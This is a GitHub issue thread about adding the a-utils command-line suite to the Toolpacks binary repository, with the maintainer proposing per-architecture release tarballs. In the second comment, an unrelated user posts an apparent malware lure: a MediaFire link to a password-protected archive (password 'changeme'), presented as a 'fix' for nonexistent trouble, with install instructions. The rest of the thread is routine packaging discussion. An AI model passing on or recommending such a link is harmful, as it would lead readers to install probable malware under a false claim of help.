### ISSUE TITLE
Request: a-utils suite

### ISSUE THREAD

**Issue by xplshn** [Azathothas/Toolpacks#31]
Hi, I was wondering if you could add a-utils, also, one question: Will I have to notify you each time I implement another command in a-utils so that you add it here? Currently, the build script will build everything into ./built/bin (remove the extend* files to avoid building external projects/tools)

https://github.com/xplshn/a-utils
Also, I make single-binary releases using a patched makebb: https://github.com/xplshn/a-utils/tree/master/patches/to_gobusybox/src/pkg/bb/bbmain

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Azathothas** [comment]
You needn't notify me nor do I have to write a sophisticated build script if you do a Github Release on each version increment. 
You can compile the a-utils binaries using flags/config of your choosing and then put all of them in a `.tar` archive pushed to the release. 
Likely in this format:
```bash
#https://github.com/xplshn/a-utils/releases/latest
#a-utils-$(uname -m)-$(uname -s).tar
a-utils-aarch64-Linux.tar
a-utils-x86_64-Linux.tar
Source code (zip)
Source code (tar.gz) 
```
Then I could just fetch straight from your source and sync to the repos.

**Comment by xplshn** [comment]
This will be the format:
https://github.com/xplshn/a-utils/releases/tag/0.0.3

**Comment by Azathothas** [comment]
Added: https://bin.ajam.dev/x86_64_Linux/Baseutils/a-utils/
